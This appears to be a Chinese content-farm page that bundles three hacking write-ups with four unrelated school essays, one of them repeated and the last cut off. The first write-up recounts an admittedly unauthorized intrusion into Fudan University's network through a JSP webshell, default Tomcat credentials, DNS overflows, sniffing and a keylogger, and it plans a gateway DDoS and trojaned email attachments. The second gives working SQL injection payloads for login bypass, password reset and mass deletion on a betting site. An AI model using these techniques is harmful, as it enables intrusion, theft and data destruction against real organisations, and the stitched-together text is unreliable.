对复旦大学的一次漫长渗透

时间:2023-06-17 07:46:40 其他范文 收藏本文 下载本文

对复旦大学的一次漫长渗透(共7篇)由网友“刘居業aJuly”投稿提供,以下是小编收集整理的对复旦大学的一次漫长渗透,欢迎阅读与借鉴。

对复旦大学的一次漫长渗透

篇1: 对复旦大学的一次漫长渗透

目标:www.fudan.edu.cn

IP: 61.129.42.5

Port:21.80.22,3306,4444,4662,8009,8080

Web:sun Unix

以上是对目标信息进行的搜集,开了22端口,管理员可能是用SSH来管理主站,上次hackest检测的时候,就是拿下了C段的一台windows主机,从而对目标主机嗅探得到FTP密码.这次我的目的不仅仅是主站,而是复旦大学的整个网络.

1. 初战告捷

思路:因为像复旦大学这样的内网,在路由器上是设置了很严格的外网访问规则的,想扫弱口令?根本不可能.(后来事实也证明了我的猜测,2级域名ping下去都是一个IP,看来是在路由那里做了端口的设置),通过脚本漏洞拿下内网的一台机器,摸清里面的结构再说吧.

结果:很轻易的拿下了一台内网机器,内网ip:10.107.0.12(windows).并且成功抓取到了管理员密码

方法:分站越多.安全越难兼顾.拿出域名查询助手,查了下其c段的域名,,一个个分站的检测,不知不觉中就发现了突破口,一个分站的论坛回复的时候可以直接上传jsp附件,估计是学生写的吧,要不怎么会让jsp文件都可以上传.很轻易的得到了一个jsp的webshell,呵呵,jsp权限很大的哦,通过教主在邪八发布的那个端口转发的工具杀进内网.(具体用法我在上期的对华中科技大学的渗透中讲过了,要多多关注黑手咯)

总结:现在对于大型的站点,asp的类型越发少了,所以大家也不要拿起注入工具,对着目标一阵乱扫,理清思路,多在上传上想办法,上传可是可以直接拿到wenshell的,还有用google搜索一些关键字,对于学校站点还是很有效的.

2. 内网徘徊

思路:身在内网,可以摸索到外网无法收集的信息.扫描-溢出-嗅探,拿手好戏当然是社工.

结果:拿下10.107.0.36 | 10.107.0.21 | 10.107.0.59三台机器(均为windows)以及若干信息.

方法:扫描出sa弱口令,拿下机器:10.107.0.36;52端口的dns溢出,拿下机器10.107.0.21;通过cain的嗅探,得到一个ftp弱口令,帐号为:administrator,密码为xxxx,社工3389,成功进入,拿下机器10.107.0.59.

总结:了解出了拓扑,对应外网的网址,内网的信息对之后的渗透起到了很重要的作用,每个系都是独立一台服务器,所以说密码社工的概率变小了,不过没关系,他们的意识都不强.

3.中途夭折

结果:在10.107.0.12上挂着xscan让它扫,睡一觉起来,服务器连不上,jsp木马显示连接不上.

总结:内网扫描的确存在很大的危险性.而且我这里是端口转向进内网,稳定性还有待考证.最重要的一点是不应该在突破口这台机器上进行过多行动,现在突破口的机器没了,那么我内网拿下的机器,以及搜集到的信息也没有任何作用了.

4.越挫越勇

思路:没有那么容易放弃的,继续想办法杀进内网,看来还是要从脚本入手了.这里我想到了jsp站点的tomact安全型会不会存在问题.

结果:成功再次杀进内网,拿下机器:10.107.0.44 | 10.61.18.40(图5)(均为windows2003),以及10.67.1.1的webshell.

方法:google搜索inurl: fudan.edu.cn jsp,在搜索到的站点后加入/manager/html,弹出登录框,输入帐号admin,密码空.成功进入.得到 webshell的方法是在tomacat里的上传里上传.war结尾的文件,这个文件里面包含了jsp马,具体的可以参看黑手08第一期小鱼写的文章. 这个方法直接得到了系统权限,要知道jsp配置不好,脚本的漏洞可以直接导致系统权限的沦陷.10.67.1.1的wenshell是通过sql注入得到,猜解出管理员帐号密码,进入后台,上传的地方不准许上传asp文件,没关系,在上传文件后面加入一个空格即可突破,asp的wenshell可是没有 jsp的大哦,不过基本没设置权限,默认安装的,替换了服务,就等他重启.

总结:管理员的弱意识让我重新进入内网,很多管理员不熟悉tomact,基本默认安装,jsp的安全是一个值得注意的问题,不为别的,有了jsp马,我都不用放后门了.

截图:

[paging]

5. 内网遨游

思路:仿佛回到了第一次进入其内部的思想,不过这次比上次的思路肯定要精准点些,现在我们的到的机器分别为:10.107.0.xxx段的 12,41,36,44.以及10.61.18.40以及10.67.1.1,跨度为3个段,挂起cain嗅探,应该会有不小的收获吧.现在的思路很明确,内网大的话往往没用方向感,这时我想到了,在10.107.0.xxx段拿下域服务器的话,那么在这个段我就可以穿行自如了.

结果:拿下了域服务器,上面安装了键盘记录.

方法:用s.exe扫描53端口,一般域服务器才会开53端口,得到结果为10.107.0.29,10.107.0.141为域服务器,dns溢出,成功进入,安装了键盘记录,就等管理员上线了.

6. 领土扩展

思路:10.107.0.xxx段基本搞定,继续扩大战果就要用到社会工程学咯,从密码和人方面社工.

结果:通过fxp拿下了内网不少机器,可是主站没有继续下去,因为始终是非授权的.

方法:虽然没有继续下去,不过我整理了下思路.

1. 选择在10.61.18.40上进行远程连接其他机器,虽然速度上会慢点,但是在日志文件里面就不会留下我的外网ip.

2. 小泽老师说要拿到拓扑结果,因为你不知道复旦的主站是内网的哪个ip,有可能是主站和分站是不同的集群,又有可能是相同的,太多可能了,拿到拓扑才可以了解清楚.怎么拿到拓扑呢?先得拿下一台网关服务器再说,因为这里的网关是路由,我们拿下了就可以知道它给ip做的是怎么样的策略.方法是,107段拿下了很多机器,一台不停的ddos网关,一台不停的嗅探,网关挂了,必然重启,这时就可以嗅到网关的密码,之后拿到路由的策略就知道主站在哪个ip上,从而对其进行嗅探.

3. 从社工的角度来获取权限,第一次进入的时候我给管理员发过邮件提示过,管理员跟我有一定的交流,从他的话中我知道了,分站是系里托管的机房,证明了主站跟分站不是一个集群,我得到了他的信任,那么我在邮件的doc上捆马会是怎么样的结果呢?拿到一台网管机同样可以达到拿到拓扑的目的,后面的方法就跟2是一样的.

7. 总结

安全检测就此结束,我在这次安检里面学习到了很多东西,一路下来,我的思路很明确,玩渗透玩的不就是思路么,希望可以是有授权的检测,毕竟没拿下主站,有些遗憾.

篇2:对东南亚某站的一次渗透

iceeye@5py.cn

iceeye@darkne2s.org

3月8日

在正文前,我先说说这个站的大概情况:Apache的服务器, 网站php+mysql,整站只有一个要验证的登陆页,因为没有注册页面,所以只能在仅有的登陆页摸索!!

因为漏洞已补,所以把记录发了出来。

经2天的摸索得知,在用户密码框里提交$password的时候,他是这样处理的:

SELECT id,username,type FROM members WHERE username='admin' AND password=PASSWORD('$password') AND `enable`='Y'

其中`enable`好像是系统常量(或者变量)

我想应该构造如下query:

SELECT id,username,type FROM members WHERE username='admin' AND password=PASSWORD('') or PASSWORD('1')=PASSWORD('1') AND `enable`='Y'

**************分析结束

简单处理一下:

SELECT id,username,type FROM members WHERE username='admin' AND password=PASSWORD('###') or PASSWORD('1')=PASSWORD('1###') AND `enable`='Y'

注意:###内的是我们应该输入的

所以,我们应该把$password设定为:') or PASSWORD('1')=PASSWORD('1

提交:

username:admin

password:') or PASSWORD('1')=PASSWORD('1

返回:

Invalid SQL: SELECT id,username,type FROM members WHERE username='admin' AND password=PASSWORD('\\') or PASSWORD(\\'1\\')=PASSWORD(\\'1') AND `enable`='Y'

好了,还差1点点

如果是这样就可以了:

SELECT id,username,type FROM members WHERE username='admin' AND password=PASSWORD('\\') or PASSWORD(\\'1\\')=PASSWORD(\\'1\\') AND `enable`='Y'

所以把password设定为:') or PASSWORD('1')=PASSWORD('1\\

提交,

Invalid SQL: SELECT id,username,type FROM members WHERE username='admin' AND password=PASSWORD('\\') or PASSWORD(\\'1\\')=PASSWORD(\\'1\\\\\\\\') AND `enable`='Y'

少提交一个\

所以把password设定为:') or PASSWORD('1')=PASSWORD('1\

提交,

Invalid SQL: SELECT id,username,type FROM members WHERE username='admin' AND password=PASSWORD('\\') or PASSWORD(\\'1\\')=PASSWORD(\\'1\\\\') AND `enable`='Y'

看来他把一个\处理为4个\

陷入苦思冥想中.................

**********************************到此一个阶段结束

冷静的分析:

目前我们需要把后面的

PASSWORD(\\'1\\')=PASSWORD(\\'1\\\\')

构造成为一个true值的表达式

但是目前可以利用的有:

1.一个 ' 变为: \\'

2.一个 \ 变为: \\\\

从数学上面分析,如果要构造起来,好像不可能

但是思想是不变得,就是要让表达式变为true

所以换函数是没有用的

********************************************

最后,能不能用注释呢?对于MySQL的注释我不是很了解,但是我想应该和Perl、Shell、PHP一样是#把:

password设定为:') or 1=1 #

那么:

SELECT id,username,type FROM members WHERE username='admin' AND password=PASSWORD('') or 1=1 #') AND `enable`='Y'

试验:成功!也就是说,可以进任意一个帐号。

这次渗透有多谢几个人,多谢吉阳的睿智,多谢emm&fzk的刺激(emm物质上的刺激和fzk精神上的打击,呵呵),多谢whg的SockMon ,最后多谢老袁的信任和支持……

记录简单,但过程是痛苦的。进站后,见到了想要的东西后, 2天不停歇的大脑再也受不了刺激了!

付:事后分析该站的结构

该网站结构

//////////////

配置文件php.ini

magic_quotes_gpc = On (猜测,系统把所有的\变为\\,把'变为'\)

所以:我们输入一个'变为\\',输入一个\变为\\\\(最后拿到配置文件证实了我的猜想)

程序对GET/POST不敏感

///////////////

因为该站不允许在IE提交数据,以下数据绝大部分都是在本地构造表单捉包得到!

///////////////////

/index.php #让整个网站在一个框架内

/app/member/index.php #首页、登陆页

/app/member/translate.php?set=zh-cn&url=$url

#对$url进行翻译的翻译,其中URL为:/app/member/index.php&uid=54f22f825e5aef4f

#备注:这里有个uid

/ok.php #空页

/app/member/login.php?uid=54f22f825e5aef4f&langx=zh-cn #登陆,uid为我当时访问网站所分配的

#POST的有用信息:uid=1c2c91396a7f1966&username=caa1307&passwd=ice3y3 #备注:用户和密码是用管理员权限进了才能添加的,也就是说,根本不能个人注册

#SQL:SELECT id,username,type FROM members WHERE username='$username' AND password=PASSWORD('$password') AND `enable`='Y'

#登陆以后,uid被重新分配,并且将 用户名 和 密码也传过去。估计在服务器会有一个数据表专门存这些数据

#可能的数据表结构:

CREATE TABLE loginuid(

uid char(16),

id integer,

username varchar(30),

time datetime

);

/app/member/chk_rule.php?mtype=&uid=1c2c91396a7f1966

#其中mtype好像不是必须的参数,也不起到什么作用

#程序对uid进行查询,如果非法,则返回首页

/app/member/FT_header.php?uid=1c2c91396a7f1966&showtype=&mtype=3

#显示最上面菜单的,后面的参数其实不是必须的,包括uid

/app/member/select.php?uid=1c2c91396a7f1966&mtype=3

#最左面的用户信息区,要求uid合法

足球

/app/member/FT_index.php?uid=1c2c91396a7f1966&langx=zh-tw&mtype=3

#进去以后,默认为显示 足球,其中mtype好像没有什么作用

/app/member/FT_browse/index.php?uid=1c2c91396a7f1966

#单场rtype=r

/js/FT_mem_showgame.js

#这个好像是下注的时候,用来在左边信息栏里面生成页面的

/app/member/FT_browse/body_var.php

#其实就是一个HTML,生成数组的,对以后的研究有用

/app/member/FT_browse/body_browse.php?uid=109dc631978b8b0&rtype=r

#显示单场信息的,不过好像不需要uid

#走地:和单场一样,只是rtype=re

# :和单场一样,只是rtype=pd

#入秋数:rtype=t

#标准过关(rtype=p)、让球过关(rtype=pr)

投注:

/app/member/FT_order/FT_order_m.php?gid=843&uid=109dc631978b8b0&type=H&gnum=301

#生成投注界面

#其中gid和gnum在body_var数组定义里面有

/app/member/FT_order/FT_order_m.php

#处理投注信息

#POST:

gold=60&uid=109dc631978b8b0&active=1&line_type=3&gid=843&type=C&gnum=301&concede_h=1&radio_h=100&ioradio_r_h=6.60&gmax_single=30000&gmin_single=50&singlecredit=1000&singleorder=500&restsinglecredit=0&wagerstotal=1000&restcredit=1000&pay_type=0

#SQL:SELECT FL,fid,pos from FT_follow WHERE gid='$gid'

#SQL:SELECT * FROM FT_param where ltype=$line_type and gid=$gid and rtype='$rtype'

#SQL:INSERT INTO wagersOU (gtype,wtype,cid,sid,aid,mid,code,code_value,pay_type,winloss_s,winloss_a,gold,gold_d,gid,gnum,strong,type,concede,ratio,ioratio,result,orderdate,adddate,wingold,wratio_c,wratio_s,wratio_a,wratio_m,wgold_c,wgold_s,wgold_a,wgold_m)VALUES('FT','M','7','26','104','453','RMB','1','0','100','30','$gold','5.00','$gid','$gnum','','C','1','100','$ioradio_r_h','0','-03-10','2004-03-10 01:03:50','0','95','95','95','100','0','0','0','0')

/app/member/FT_order/FT_order_p.php

#生成临时投注

#POST:

game_id1=844&game1=H&game_id2=846&game2=H&game_id3=847&game3=H&game_id4=848&game_id5=849&game_id6=845&game_id7=850&teamcount=7&active=1&uid=6defa21b702a5d87&TEAM0310=%C8%B7%C8%CF

#SQL:SELECT FL,fid,pos from FT_follow WHERE gid='$game_id1'

#SQL:select ioratio from FT_param where gid='903' AND rtype='M$game1'

/app/member/FT_order/FT_order_pr.php?active=3&uid=109dc631978b8b0&tmp_id=76507&pdate=2004-03-10

#删除临时投注,注意tmp_id

#SQL:delete from wagers_tmp where id=$tmp_id

/app/member/FT_order/FT_order_pr_finish.php

#多个投注处理

#POST:

wkind=S&wstar=3&gold=50&uid=109dc631978b8b0&active=1&teamcount=3&username=caa1307&singlecredit=1000&singleorder=500&gmin_single=50&gmax_single=500&restcredit=854&wagerstotal=0&pay_type=0&sc=0+0+0+&pdate=2004-03-10

#SQL:SELECT id,gold,code_value FROM wagersP WHERE mid=453 and star=$teamcount and rtype='PR' and gtype='FT'

/app/member/result/result.php?game_type=FT&uid=109dc631978b8b0

#比赛结果

#POST:game_type=FT&today=2004-03-10&submit=%B2%E9%D1%AF

#SQL:select id,name_c,name_g,name_e from $game_type_leagues

#SQL:select * from $game_type where league_id='199' and date='$today' and game_over='Y' ORDER BY num_c

会员资料:

/app/member/account/mem_data.php?uid=109dc631978b8b0

#会员资料,uid必须合法

/app/member/account/chg_passwd.php?uid=109dc631978b8b0

#修改密码

/app/member/account/chg_passwd.php?uid=109dc631978b8b0

#action=1的时候处理密码信息

#POST:password=ice3y3&action=1&uid=109dc631978b8b0

#SQL:update members set password=PASSWORD('$password'),passwd='$password' where id='453'

#注释:其中members.password是加密后的密码,passwd是明文,id是根据uid算出来的

#构造:update members set password=PASSWORD('$password'),passwd='$password' where id='453'

****************************************************

程序分析:

登陆:

#SQL:SELECT id,username,type FROM members WHERE username='$username' AND password=PASSWORD('$password') AND `enable`='Y'

它验证的是members.password,也就是被加密过的密码字段,而不是明文密码字段,所以我们修改密码只需要修改members.password

通过/app/member/account/chg_passwd.php?uid=109dc631978b8b0 修改

#SQL:update members set password=PASSWORD('$password'),passwd='$password' where id='453'

#由于 ' 最终 被替换为 \\' , \ 最终 被替换为 \\\\,所以我们修改的密码都得有\字符

#$password=newpwd') where id=id/*

#系统处理以后 最终 变为:$password=newpwd\\') where id=id/*

#代入SQL:

#SQL:update members set password=PASSWORD('newpwd\\') where id=id/*'),passwd='newpwd\\') where id=id/*' where id='453'

#等价于SQL:update members set password=PASSWORD('newpwd\\') where id=id

#其中的id可以是任何一个数字

删除临时投注:

/app/member/FT_order/FT_order_pr.php?active=3&uid=109dc631978b8b0&tmp_id=76507&pdate=2004-03-10

#删除临时投注,注意tmp_id

#SQL:delete from wagers_tmp where id=$tmp_id

#$tmp_id=1 or 1=1/*

#SQL:delete from wagers_tmp where id=1 or 1=1

#结果:删除所有的临时投注

//////////////////////////////////////////////版权为iceeye本人所有,请著明

篇3:一次奇遇的渗透

其实这一步可以完全省略,都说了是奇遇了,其实就是检查下自己的站点是否安全

作者:y0umer

打开网站发现

习惯的加了一个引号    确定是注入以后直接丢啊D了。(我懒)    这不悲剧了么,猜不出表段??

扫扫目录看看。

发现del.asp打开看看。。    错误提示的是在查询表达式中“id=”的错误 也就是查询错误。没有id的值。

随便加一个del.asp?id=1

相当悲剧之。直接爆数据库路径了。。

然后下载,打开找到admin表段,

其实就是admin

找到后台登陆,相当悲剧

继续看数据库。。    顺利登陆。    看见了数据库备份。。

瞬间瞬间激动了。。

好吧,瞬间上传一个图片。。

这里判断了文件头。

我们需要合并......

合并成mjjw.png    然后我们把上传mjjw.png    然后备份    访问下吧。    然后我们用菜刀连接即可。。

篇4:一次漫长的等待-记叙文

一次漫长的等待-记叙文600字

“今天又是星期五了,明天又可以睡到自然醒啦!时间过得真快,生活太美好了!”我望着已清清楚楚标明4:50分的挂在墙上的时钟,兴奋地说道。

这时,一个坏消息传来:“徐紫睿,你外婆要迟点来接你,你留在教室做作业吧”“哦”我应了一声,感觉万分无聊。渐渐地,同学们和老师都走光了。我盯着窗外越下越大的雨,发着呆。雨一滴一滴地落在了地上,溅起一朵一朵晶莹剔透的水花,天空浮起了一层淡淡的薄雾。对于这番美景,我却无心欣赏,我望着越来越黑的天,心中浮出了许些恐惧,外婆会不会不要我了?我趴在窗台上,看着大门,眼前走过了一对母子,看着他们那副亲热的样子,我的眼泪像断了线的珍珠一样往下掉。在泪水中,我朦胧地看到了一个人影,走进大门。“外婆,是外婆!”我一下子就认了出来。我快速地跑下了楼梯。飞也似奔进了外婆的.怀抱。

坐在自行车后面,我看见了外婆已花白的头发。眼泪又一次不争气地掉了下来。外婆。您手上的茧子因我而增;您脸上的皱纹因我而添;您头上的白发因我而加!我看见,外婆的衣服被打湿了,脸上也挂满了雨珠。可外婆仍坚强地与“雨神”斗争。一脚一脚地踩着轮子回家,那时我真想大声地对天空说:“不许你再哭泣,不许你再下雨,我要保护我的外婆。使她免受雨水的伤害!”终于,天空在外婆的坚持不懈下服输了。天空放晴了!外婆也骑回了家。虽然外婆身上全湿了,可她还是先问我怎么样,有没有被淋湿等一系列的问题。我跑过去紧紧地抱住了外婆!

外婆!您是这个世界上最疼爱我。也最关心我的人!外婆!我也爱您!

篇5:那是一次漫长的尝试作文

每个人在他的漫长的人生旅途中,都会遇到许多次的尝试与挑战。或许收到失败的教训,或许收获成功的喜悦。我也有一次漫长的尝试,那就是我尝试着读完一本书。

高尔基曾经说过:“书是人类进步的阶梯。”还有一位伟人也说过:“书,尤药也,善读可以医愚。”但是,我不是这么认为的,因为,读书对于我来说,比得上让我上刀山、下火海,要比大海捞针、一步登天还要困难。所以,我的作文和阅读水平一直不是很高。妈妈为我这事非常犯愁,给我报了补习班,但效果不是很明显。妈妈那是干着急。妈妈在老师的`建议下,要我多读一点书,并且语重心长地对我说:“孩子,多读一些书吧!书中自有黄金屋啊!”“可是,我真的看不进去啊!”

“读书不能着急,你要慢慢地去品味。你会发现,读书是一件很有趣的事情。”妈妈语重心长地说。

听了妈妈一席话,我还真的心血来潮,很想尝试一下读书的滋味。我选了一本童话书《绿野仙踪》。拿到这本书以后,我仔细地看了看。它并不很厚,深蓝色的封皮,上面画着一个小女孩儿,一头棕黄色的大狮子,一个锅炉和一个稻草人。翻开书来,我闻到一股淡雅的墨香。拿在手上时,手感是那样的光滑细腻。我忽然觉得,我开始喜欢上书了。我翻来扉页,一字一句认真地读起来。这本书仿佛在故意挑战我的耐心,慢慢地让我爱不释手。妈妈看了,高兴地对我说:“女儿,读书其实是一件很快乐的事儿,慢慢去品读吧!”我默默地点了点头。

就这样,我一次又一次地尝试着仔细品读好书,与书为友。在老师和妈妈的陪伴下,我的语文成绩一点点提高了。现在我在考试中的成绩能达到95分以上。我深深知道,这都是老师、妈妈和我共同付出、努力的结果啊!

在人生的旅途中,我们会遇到太多没有经历过的事情。正因为如此,我们更要学会挑战自我,不断尝试,让我们的人生变得更加精彩!

篇6:那是一次漫长的尝试作文

【荐】那是一次漫长的尝试作文

每个人在他的漫长的人生旅途中,都会遇到许多次的尝试与挑战。或许收到失败的教训,或许收获成功的喜悦。我也有一次漫长的尝试,那就是我尝试着读完一本书。

高尔基曾经说过:“书是人类进步的阶梯。”还有一位伟人也说过:“书,尤药也,善读可以医愚。”但是,我不是这么认为的,因为,读书对于我来说,比得上让我上刀山、下火海,要比大海捞针、一步登天还要困难。所以,我的作文和阅读水平一直不是很高。妈妈为我这事非常犯愁,给我报了补习班,但效果不是很明显。妈妈那是干着急。妈妈在老师的建议下,要我多读一点书,并且语重心长地对我说:“孩子,多读一些书吧!书中自有黄金屋啊!”“可是,我真的看不进去啊!”

“读书不能着急,你要慢慢地去品味。你会发现,读书是一件很有趣的事情。”妈妈语重心长地说。

听了妈妈一席话,我还真的心血来潮,很想尝试一下读书的滋味。我选了一本童话书《绿野仙踪》。拿到这本书以后,我仔细地看了看。它并不很厚,深蓝色的封皮,上面画着一个小女孩儿,一头棕黄色的大狮子,一个锅炉和一个稻草人。翻开书来,我闻到一股淡雅的墨香。拿在手上时,手感是那样的光滑细腻。我忽然觉得,我开始喜欢上书了。我翻来扉页,一字一句认真地读起来。这本书仿佛在故意挑战我的耐心,慢慢地让我爱不释手。妈妈看了,高兴地对我说:“女儿,读书其实是一件很快乐的事儿,慢慢去品读吧!”我默默地点了点头。

就这样,我一次又一次地尝试着仔细品读好书,与书为友。在老师和妈妈的陪伴下,我的语文成绩一点点提高了。现在我在考试中的成绩能达到95分以上。我深深知道,这都是老师、妈妈和我共同付出、努力的结果啊!

在人生的旅途中,我们会遇到太多没有经历过的事情。正因为如此,我们更要学会挑战自我,不断尝试,让我们的人生变得更加精彩!

篇7:那是一次漫长的尝试作文

现在的小女孩都喜欢玩布娃娃,我小时候也是,但是,帮布娃娃缝制一件衣服可不是一件容易的事,要很仔细很仔细,很用心很用心,还要把娃娃看成自己的宝宝来看待。

6岁的时候,妈妈帮我买了一个漂亮的布娃娃。我可喜欢她了。由于她穿了一条青色长裙,我便把她取名为“青青”。

我的“青青”,她只有一件衣服。我想帮她做一件衣服。但我当时不会做衣服,我便叫姐姐来叫我做。

要先量好尺寸剪布,再穿针。穿好针,在线的尾处打个结,就要开始缝了,把剪好的布翻一面,对折。用针从头到尾一针一针的缝,缝好之后再打个结,用剪刀剪掉多余的部分就行了。

但我太笨拙,连针都穿不进。穿了十几次,我终于有点不耐烦了,开始乱穿。这回好了,更穿不进了。终于,我放下了手中的针线说:“穿不了!穿不进,姐姐,你帮我穿吧!”姐姐严肃地:“不行,自己穿!你还要不要给‘青青’做衣服了?”我只好再穿。又穿了几次,终于穿进了,我高兴极。穿针的问题是解决了,但剪布……

我拿来一块废布,在“青青”身上为了一圈,确定好了尺寸,便剪开了,

看来,无论做什么事都要小心、仔细,,还要有耐心。等你走上社会了,工作了,就更要细心了,因为也许你犯了一点点小

心理班级活动总结

美文化习惯与高中英语教学

处理好记叙文中记叙议论和抒情

《物理学史》读后感

对未来迷茫句子摘抄

道德教育心得体会范文

道德论文

门文化在现代空间环境设计的应用论文

关于走进高一的作文

包装设计与产品的关系论文

对复旦大学的一次漫长渗透
《对复旦大学的一次漫长渗透.doc》
将本文的Word文档下载到电脑,方便收藏和打印
推荐度:
点击下载文档

【对复旦大学的一次漫长渗透(共7篇)】相关文章:

道德教育演讲稿2023-01-31

内心独白怎么写2023-11-18

清华大学教授老师在开学典礼上的演讲词2023-06-30

初二语文下册《再塑生命》公开课说课稿2023-09-13

药厂实习报告总结2023-01-29

浅谈畲族民间艺术在学校美术教学中的传承2024-01-23

高中物理学史总结2023-06-12

入爱心社团申请书2022-09-27

试论危机中的汉语言文字2023-09-02

高中入社团申请书范文大全2023-01-11

点击下载本文文档